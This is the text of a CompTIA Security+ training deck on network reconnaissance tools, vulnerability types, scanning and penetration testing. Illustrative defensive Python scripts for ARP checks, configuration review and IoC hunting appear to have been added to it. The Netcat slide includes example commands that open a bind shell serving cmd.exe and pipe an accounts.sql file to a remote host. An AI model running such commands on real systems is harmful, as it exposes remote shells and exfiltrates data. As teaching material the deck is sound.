sy0-601-03v1.0.pptx

Performing Security Assessments

Lesson 3


Topic 3A: Assess Organizational Security with Network Reconnaissance Tools

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org


Syllabus Objectives Covered

4.1 Given a scenario, use the appropriate tool to assess organizational security


ipconfig, ping, and arp

Footprinting the network layout and rogue system detection

ipconfig/ifconfig/ip

Report the local IP configuration

ping

Test connectivity with a host

Use a ping sweep to detect live hosts on a subnet

arp

Address Resolution Protocol (ARP) cache

Shows IP to Media Access Control (MAC) address mapping

Detect spoofing (validate MAC of default gateway)

Screenshot used with permission from Microsoft.
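As an added illustration of the spoofing check on this slide (not part of the CompTIA material), the script below parses a constructed Windows arp -a listing, compares the gateway's cached MAC against a recorded known-good value, and flags any MAC that answers for more than one unicast address. The sample output, the gateway address 10.1.0.1 and the expected MAC are constructed values.

```python
import re
from collections import defaultdict

# Constructed sample of Windows "arp -a" output (not from the slides). The cached
# gateway MAC differs from the recorded one, and that same MAC also answers for
# 10.1.0.254: a typical ARP poisoning pattern.
SAMPLE_ARP_OUTPUT = """Interface: 10.1.0.101 --- 0x4
  Internet Address      Physical Address      Type
  10.1.0.1              00-15-5d-01-ca-05     dynamic
  10.1.0.50             00-0c-29-4a-11-9b     dynamic
  10.1.0.254            00-15-5d-01-ca-05     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""
# Assumed known-good gateway MAC, e.g. from a baseline taken on a trusted network.
GATEWAY_IP = "10.1.0.1"
GATEWAY_MAC = "00-1a-2b-3c-4d-5e"

ENTRY_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+\w+")

def parse_arp_table(text):
    """Return {ip: mac} from arp -a output; MACs lowercased and dash-separated."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace(":", "-")
    return table

def check_arp(table, gateway_ip, expected_mac):
    """Flag a missing/changed gateway MAC and any MAC claiming several unicast IPs."""
    findings = []
    seen = table.get(gateway_ip)
    if seen is None:
        findings.append(f"gateway {gateway_ip} missing from ARP cache")
    elif seen != expected_mac.lower():
        findings.append(f"gateway {gateway_ip} MAC changed: expected {expected_mac.lower()}, saw {seen}")
    ips_by_mac = defaultdict(list)
    for ip, mac in table.items():
        if not 224 <= int(ip.split(".")[0]) <= 239:   # skip multicast group entries
            ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings

if __name__ == "__main__":
    for finding in check_arp(parse_arp_table(SAMPLE_ARP_OUTPUT), GATEWAY_IP, GATEWAY_MAC):
        print("ALERT:", finding)
```

Run it periodically against the real cache and alert on any finding; a gateway MAC that changes without a known hardware swap deserves a look at the switch port the new MAC lives on.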


route and traceroute

route

Show the local routing table

Identify default route and local subnet

Check for suspicious entries

tracert/traceroute

Test the path to a remote host

pathping/mtr

Measure latency


IP Scanners and Nmap

Host discovery

Test whether host in IP range responds to probes

Port scan

Test whether TCP or UDP port allows connections

Screenshot used with permission from nmap.org.


Service Discovery and Nmap

Service discovery

Scan custom TCP/UDP port ranges

Service and version detection

Fingerprinting each port

Protocol

Application/version

OS type

Device type

Screenshot used with permission from nmap.org.

netstat and nslookup

netstat

Report port status on local machine

Switches to filter by protocol

Display process name or PID that opened port

nslookup and dig

Query name servers

Zone transfers

Screenshot used with permission from Microsoft.


Other Reconnaissance and Discovery Tools

theHarvester

Collate open source intelligence (OSINT)

dnsenum

Collate DNS hosting information, name records, and IP schemas

scanless

Collate results from third-party port scanning sites

curl

Craft and submit protocol requests

Nessus

Perform automated vulnerability scanning

Packet Capture and tcpdump

Packet analysis versus protocol analysis

Sniffer: tool for capturing network frames

Use software to interact with host network driver (libpcap/winpcap)

Mirrored ports/switched port analyzer (SPAN)

Use a test access port (TAP) device to read frames from network media

Placement of sensors

tcpdump

Write to pcap

Read from pcap

Filters

tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"

Packet Analysis and Wireshark

Output panes

Packet list

Packet details (headers and fields)

Packet bytes (hex and ASCII)

Capture and display filters

Coloring rules

Follow TCP Stream

Screenshot used with permission from wireshark.org.


Packet Injection and Replay

Packet injection

Crafting spoofed packets

Dsniff, Ettercap, Scapy

hping

Host/port detection and firewall testing

Traceroute

Denial of service (DoS)

tcpreplay

Stream a packet capture through an interface

Sandbox analysis and intrusion detection testing


Exploitation Frameworks

Simulate adversary tools for exploitation and backdoor access

Metasploit

Modules to exploit known code vulnerabilities

Couple exploit module with payload

Obfuscate code to evade detection

Sn1Per

Penetration test reporting and evidence gathering

Run automated suites of tests

Other frameworks

Linux, embedded, browser, web/mobile app, cloud, …


Screenshot used with permission from metasploit.com


Netcat

Simple tool capable of a very wide range of network tasks

Port scanning and fingerprinting

Command prompt listener over arbitrary port

File transfer over arbitrary port

echo "head" | nc 10.1.0.1 -v 80

nc -l -p 666 -e cmd.exe

type accounts.sql | nc 10.1.0.192 6666

Review Activity: Organizational Security with Network Reconnaissance Tools

Lab Activity: Assisted Labs

Scanning and Identifying Network Nodes

Intercepting and Interpreting Network Traffic with Packet Sniffing Tools

Topic 3B: Explain Security Concerns with General Vulnerability Types


Syllabus Objectives Covered

1.6 Explain the security concerns associated with various types of vulnerabilities


Software Vulnerabilities and Patch Management

Exploits for faults in software code

Applications

Different impacts and exploit scenarios

Client versus server apps

Operating system (OS)

Obtain high level privileges

Firmware

PC firmware

Network appliances and Internet of Things devices

Improper or weak patch management

Undocumented assets

Failed updates and removed patches


Zero-day and Legacy Platform Vulnerabilities

Zero-day

Vulnerability is unknown to the vendor

Threat actor develops an exploit for which there is no patch

Likely to be used against high value targets

Legacy platform

Vendor no longer releases security patches

Weak Host Configurations

Default settings

Vendor may not release product in a default-secure configuration

Unsecured root accounts

Threat actor will gain complete control

Limit ability to log in as superuser

Open permissions

Configuration errors allowing unauthenticated access

Allowing write access when only read access is appropriate

Weak Network Configurations

Open ports and services

Restrict using an access control list

Disable unnecessary services or block ports

Block at network perimeter

Unsecure protocols

Cleartext data transmissions are vulnerable to snooping and eavesdropping

Weak encryption

Storage and transport encryption

Key is generated from a weak password

Cipher has weaknesses

Key distribution is not secure

Errors

Error messages that reveal too much information


Impacts from Vulnerabilities

Data breaches and data exfiltration impacts

Data breach is where confidential data is read or transferred without authorization

Data exfiltration refers to the methods and tools by which an attacker transfers data without authorization

Identity theft

Abuse of data from privacy breaches

Data loss and availability loss impacts

Availability is also a critical security property

Financial and reputation impacts

Third-Party Risks

Supply chains

Due diligence

Weak links

Vendor management

Process for selecting suppliers and evaluating risks

System integration

Lack of vendor support

Outsourced code development

Data storage

Cloud-based versus on-premises risks

Review Activity: Security Concerns with General Vulnerability Types

Topic 3C: Summarize Vulnerability Scanning Techniques


Syllabus Objectives Covered

1.7 Summarize the techniques used in security assessments


Security Assessment Frameworks

Methodology and scope for security assessments

NIST SP 800-115

Testing

Examining

Interviewing

Vulnerability assessment versus threat hunting and penetration testing

Vulnerability assessments can use a mix of manual procedures and automated scanning tools


Vulnerability Scan Types

Automated scanners configured with list of known vulnerabilities

Network vulnerability scanner

Configured with tests for most types of network hosts

Focused on scanning OS plus some desktop and server applications

Application and web application scanners

Configured with application-specific tests

Screenshot used with permission from Greenbone Networks (openvas.org).


Common Vulnerabilities and Exposures

Vulnerability feed/plug-in/test

Security Content Automation Protocol (SCAP)

Mechanism for updating scanner via feed

Common identifiers

Common Vulnerabilities and Exposures (CVE)

Common Vulnerability Scoring System (CVSS)

Score   Description
0.1+    Low
4.0+    Medium
7.0+    High
9.0+    Critical


Intrusive versus Non-intrusive Scanning

Remote scanning versus agent-based scanning

Non-intrusive scanning

Passively test security controls

Scanners attach to network and only sniff traffic

Possibly some low-level interaction with hosts (port scanning/banner grabbing)

Intrusive/active scanning

Establish network session

Agent-based scan

Exploitation frameworks

Highly intrusive/risk of system crash

Used with penetration testing


Credentialed versus Non-credentialed Scanning

Non-credentialed

Anonymous or guest access to host only

Might test default passwords

Credentialed

Scan configured with logon

Can allow privileged access to configuration settings/logs/registry

Use dedicated account for scanning


Screenshot used with permission from Greenbone Networks (openvas.org).

False Positives, False Negatives, and Log Review

Analyzing and validating scan report contents

False positives

Scanner identifies a vulnerability that is not actually present

False negatives

Scanner fails to identify a vulnerability

Review logs to confirm results


Screenshot used with permission from Greenbone Networks (openvas.org).

Configuration Review

Lack of controls

Security controls that should be present but are not (or are not functioning)

Misconfiguration

Settings deviate from template configuration

Driven by templates of configuration settings

Open Vulnerability and Assessment Language (OVAL)

Extensible Configuration Checklist Description Format (XCCDF)

Compliance-based templates available in many products

Screenshot used with permission from Microsoft.
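An added example, not from the CompTIA slides or any vendor template, showing how a configuration review separates a lack of controls from a misconfiguration: each setting in a baseline template is either absent from the host snapshot, present but deviating from the template value, or compliant. The setting names, expected values and host snapshot are constructed stand-ins for what an OVAL/XCCDF-driven template would express.

```python
# Constructed baseline template and host snapshot (not from the slides). Setting
# names and values are illustrative stand-ins, not any real vendor benchmark.
BASELINE = {
    "password_min_length":   {"expected": 14,    "compare": "min"},
    "password_max_age_days": {"expected": 90,    "compare": "max"},
    "smbv1_enabled":         {"expected": False, "compare": "eq"},
    "firewall_enabled":      {"expected": True,  "compare": "eq"},
    "audit_logon_events":    {"expected": True,  "compare": "eq"},
}

HOST_SNAPSHOT = {
    "password_min_length": 8,       # deviates: too short
    "password_max_age_days": 365,   # deviates: too long
    "smbv1_enabled": True,          # deviates: legacy protocol left on
    "firewall_enabled": True,       # compliant
    # "audit_logon_events" is absent: the control is not configured at all
}

# How a snapshot value is judged against the template's expected value.
COMPARATORS = {
    "eq": lambda actual, expected: actual == expected,
    "min": lambda actual, expected: actual >= expected,
    "max": lambda actual, expected: actual <= expected,
}

def review_configuration(baseline, snapshot):
    """Classify each baseline setting as compliant, misconfigured, or a lack of control.

    A setting missing from the snapshot is a lack of control; one that is present
    but fails its comparison against the template value is a misconfiguration.
    """
    report = {"lack_of_control": [], "misconfiguration": [], "compliant": []}
    for name, rule in baseline.items():
        if name not in snapshot:
            report["lack_of_control"].append(name)
            continue
        actual, expected = snapshot[name], rule["expected"]
        if COMPARATORS[rule["compare"]](actual, expected):
            report["compliant"].append(name)
        else:
            report["misconfiguration"].append(
                f"{name}: expected {rule['compare']} {expected}, found {actual}")
    return report

if __name__ == "__main__":
    for category, items in review_configuration(BASELINE, HOST_SNAPSHOT).items():
        print(category)
        for item in items:
            print("  -", item)
```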


Threat Hunting

Use log and threat data to search for IoCs

Advisories and bulletins

Plan threat hunting project in response to newly discovered threat

Intelligence fusion and threat data

Use security information and event management (SIEM) and threat data feed to automate searches

Maneuver

Consider possibility of alerting adversary to the search

Use techniques that will give positional advantage
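An added example (not part of the slides) of the automated IoC search described above: indicators from a threat data feed are matched against DNS, proxy and endpoint log lines, and the hits are traced back to the internal hosts to triage. The feed values and log lines are constructed; the addresses and domains use reserved documentation ranges and names, and the hash is a placeholder.

```python
import re

# Constructed threat-data feed (not from the slides). Values are documentation
# ranges/reserved names and a placeholder hash, standing in for a real feed.
IOC_FEED = {
    "ip": {"203.0.113.7", "198.51.100.23"},
    "domain": {"update-check.invalid", "cdn-static.example"},
    "sha256": {"a" * 64},
}

# Constructed sample log lines in three formats (DNS, proxy, EDR file event).
SAMPLE_LOGS = [
    "2020-06-01T09:12:03Z dns client=10.1.0.55 query=cdn-static.example type=A",
    "2020-06-01T09:12:04Z proxy src=10.1.0.55 dst=203.0.113.7:443 url=https://cdn-static.example/a.js",
    "2020-06-01T09:13:10Z dns client=10.1.0.60 query=www.example.org type=A",
    "2020-06-01T09:14:22Z edr host=WS-0055 file=C:\\Users\\Public\\svc.exe sha256=" + "a" * 64,
    "2020-06-01T09:15:00Z proxy src=10.1.0.61 dst=192.0.2.10:80 url=http://intranet.local/",
]

# Type-specific tokenisers, so a domain inside a URL or a hash at the end of
# an EDR event is still extracted and compared with the feed.
PATTERNS = {
    "ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "domain": re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.IGNORECASE),
    "sha256": re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE),
}

def hunt_iocs(lines, feed):
    """Return sorted (line_no, ioc_type, indicator) for every feed indicator seen."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ioc_type, pattern in PATTERNS.items():
            for value in set(pattern.findall(line)):
                if value.lower() in feed.get(ioc_type, set()):
                    hits.append((n, ioc_type, value.lower()))
    return sorted(hits)

def hosts_to_triage(lines, feed):
    """Map each matching log line back to the internal host field it names."""
    host_re = re.compile(r"\b(?:client|src|host)=([^\s]+)")
    hosts = set()
    for n, _, _ in hunt_iocs(lines, feed):
        m = host_re.search(lines[n - 1])
        if m:
            hosts.add(m.group(1))
    return sorted(hosts)
```

In a SIEM the same logic becomes a scheduled search fed by the indicator list; the per-type tokenising matters because a feed domain rarely appears as a whole field on its own.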

Review Activity: Vulnerability Scanning Techniques

Lab Activity: Assisted Labs

Analyzing the Results of a Credentialed Vulnerability Scan

Topic 3D: Explain Penetration Testing Concepts


Syllabus Objectives Covered

1.8 Explain the techniques used in penetration testing


Penetration Testing

Pen test or ethical hacking

Verify threat

Identify vulnerability and the vector by which it could be exploited

Bypass security controls

Identify lack of controls or ways to circumvent existing controls

Actively test security controls

Examine weaknesses that render controls ineffective

Exploit vulnerabilities to prove threat exists (“pwned”)

Active and highly intrusive techniques, compared to vulnerability assessment


Rules of Engagement

Agreement for objectives and scope

Authorization to proceed from system owner and affected third parties

Attack profile

Black box (unknown environment)

White box (known environment)

Gray box (partially known environment—to model insider threat agents, for instance)

Bug bounty programs


Exercise Types

Red team

Performs the offensive role

Blue team

Performs the defensive role

White team

Sets the rules of engagement and monitors the exercise

Purple team

Exercise set up to encourage collaboration

Red and blue teams share information and debrief regularly

Might be assisted by a facilitator

Passive and Active Reconnaissance

Pen testing and kill chain attack life cycle

Reconnaissance phase

Passive techniques unlikely to alert target

Active techniques are detectable

Open Source Intelligence (OSINT)

Social engineering

Footprinting

War driving

Drones/unmanned aerial vehicle (UAV) and war flying


Pen Test Attack Life Cycle

Initial exploitation

Obtain a foothold via an exploit

Persistence

Establish a command & control backdoor

Reconnect across host shut down/user log off events

Privilege escalation

Internal reconnaissance

Gain additional credentials and compromise higher privilege accounts

Lateral movement

Compromise other hosts

Pivoting

Access hosts with no direct remote connection via a pivot host

Actions on objectives

Cleanup


Review Activity: Penetration Testing Concepts

Lesson 3 Summary